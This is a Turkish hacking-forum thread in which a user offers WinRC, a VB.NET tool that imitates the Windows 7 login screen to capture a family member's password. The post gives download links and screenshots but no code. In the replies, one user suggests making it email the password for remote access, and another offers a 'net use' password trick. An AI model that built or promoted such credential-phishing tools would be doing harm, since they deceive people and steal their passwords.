WinRC v1.0 - Aileden Gizli Şifreyi Öğrenme #DÜNYADA İLK!#

SanalVurus

Katılımcı Üye
26 Tem 2013
294
0
Trabzon
Programın ismi : WinRC

+ Programın sürümü : 1

+ Yazılım Kök Tarihi: 31.03.2014

+ Kullanılan programlama dili : VB.NET

+ Programın ve kaynak kodunun adresi: SanalVurus

Merhaba arkadaşlar;
Bu programıda araştırmalarıma göre Türkiye'de yapan ilk benim. Bu program windows7'nin login ekranının fakesi alınarak ailenin bildiği şifreyi öğrenmek amaçlandı. Zamanında bende çok çekmişimdir :D. Yeni nesilde çekmesin diye yapdım.

Eklenmesi gerekenleri ve eksiklerimi bana özel mesaj olarak bildirirseniz sevinirim.

Kullanım;

wbqabY.jpg

wj0anG.jpg

K47300.jpg

eWBybq.jpg

e79p7m.jpg

x8q3PV.jpg

Virüs Total ;

Virus Total Sonucu Görmek için TIKLA

INDIRME LINKI ;

DOSYA.TC
BOX.COM

Teşekkürü Butonunu Kullanalım Lütfen :yo

P@cth

Analist
22 Tem 2013
888
13
güzel bunu server oluşturmalı yapsan ve şifreyi sana yollasa gmailden adamın pcye uzaktan erişirsin :)

'Black-King

Yaşayan Forum Efsanesi
30 Tem 2012
10,353
340
İstanbul
Eline sağlık :D bunu kullanana kadar komut sıstemıyle açsada cmd'den
net use "PC ADI" 123456 yapsa şıfreyı değıştırse daha kolay değılmı ? :D

Vb6TT

Üye
20 Nis 2013
214
0
Black adanlm gizlice almaya calisiyor bide dunyada ilk nedir ginede eline saglik

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.